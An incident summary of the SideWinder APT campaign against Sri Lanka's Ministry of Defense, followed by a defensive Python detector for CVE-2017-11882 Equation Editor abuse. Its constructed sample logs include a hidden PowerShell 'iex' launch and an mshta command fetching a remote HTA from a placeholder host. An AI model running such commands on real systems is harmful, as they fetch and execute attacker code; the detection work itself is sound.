Cyber Incident Victim: Sri Lankan Ministry of Defense
Date: Dec 2020
Location: Sri Lanka
Summary
The SideWinder advanced persistent threat (APT) group conducted a cyber espionage campaign against military and government entities in South Asia, including Nepal, Afghanistan, and Sri Lanka, using phishing emails built around regional territorial-dispute lures. The attackers combined credential harvesting, email-delivered backdoors, and malicious mobile applications to compromise systems and steal sensitive information. The operation aimed to gather intelligence from high-value targets through coordinated social engineering and malware distribution.
Description
The SideWinder APT group targeted government and military units in South Asia, including the Sri Lankan Ministry of Defense, with phishing and malware. They built convincing fake webmail login pages to harvest credentials and installed a backdoor to exfiltrate sensitive information. Malicious documents exploited CVE-2017-11882, a memory-corruption flaw in the Microsoft Office Equation Editor (EQNEDT32.EXE) that Microsoft patched in November 2017, to run code that collected system information and uploaded it to a command-and-control server. The campaign also included mobile apps designed to collect private data, although some were still under development. The attack compromised confidentiality and integrity; there is no evidence that system availability was affected.
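The execution technique named above, CVE-2017-11882, has a simple host-level tell: the exploit runs attacker code inside the Equation Editor process, and EQNEDT32.EXE has no legitimate reason to launch child processes. The detection below is an added example written for this page, not SideWinder tooling, a vendor rule, or anything from the incident report. It scans Sysmon-style process-creation records for that parent/child relationship, and, going one step beyond the specific case in the text, also flags the broader pattern of an Office application spawning a shell or script host. The log lines are constructed sample input, and the field names follow Sysmon Event ID 1 as a log shipper would forward them in JSON lines; hostnames and paths are invented.

```python
"""Detection for CVE-2017-11882 (Equation Editor) exploitation and the related
Office-spawns-script-host pattern, run over constructed Sysmon-style JSON lines.
Illustrative code for this page; not the incident's actual telemetry."""

import json
import ntpath  # parses Windows paths correctly even when run on Linux/macOS

# Constructed sample input: Sysmon Event ID 1 (process creation) records plus one
# Event ID 3 (network) record, serialised as JSON lines. Not real incident data.
SAMPLE_LOG = r"""
{"EventID": 1, "Computer": "WS01", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "splwow64.exe 8192"}
{"EventID": 1, "Computer": "WS01", "ParentImage": "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -w hidden -ep bypass -c iex(...)"}
{"EventID": 1, "Computer": "WS02", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta http://example.invalid/x.hta"}
{"EventID": 1, "Computer": "WS03", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"}
{"EventID": 3, "Computer": "WS01", "Image": "C:\\Windows\\System32\\cmd.exe", "DestinationIp": "198.51.100.7"}
"""

# Office front-ends that open attacker-supplied documents.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Binaries commonly used as the first stage after a document exploit or macro.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path ('' if missing)."""
    return ntpath.basename(path or "").lower()


def classify(event: dict):
    """Return (severity, reason) for a process-creation event, or None."""
    if event.get("EventID") != 1:
        return None  # only process-creation records carry parent/child data
    parent = basename(event.get("ParentImage"))
    child = basename(event.get("Image"))
    if parent == "eqnedt32.exe":
        # Equation Editor never legitimately spawns anything; any child is
        # consistent with CVE-2017-11882 exploitation.
        return ("high", "EQNEDT32.EXE spawned a child process (CVE-2017-11882)")
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        # Broader pattern: document-driven code execution handing off to a
        # script host. Lower confidence because some add-ins do this.
        return ("medium", "Office application spawned a shell or script host")
    return None


def detect(log_text: str) -> list:
    """Run classify() over JSON-lines input and return structured findings."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        verdict = classify(event)
        if verdict is None:
            continue
        severity, reason = verdict
        findings.append({
            "severity": severity,
            "reason": reason,
            "host": event.get("Computer"),
            "parent": basename(event.get("ParentImage")),
            "child": basename(event.get("Image")),
            "cmdline": event.get("CommandLine", ""),
        })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"[{f['severity'].upper()}] {f['host']}: {f['parent']} -> "
              f"{f['child']} :: {f['reason']}\n    {f['cmdline']}")
```

The WINWORD.EXE to splwow64.exe record is deliberately left unflagged: it is a normal print-spooler helper, and a rule that fires on every Office child process will drown the real signal. In a live deployment the same logic is usually expressed as an EDR or Sigma rule on ParentImage; the EQNEDT32.EXE condition is worth keeping even on patched estates, because any host where that binary still exists and still spawns children has not received the fix.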
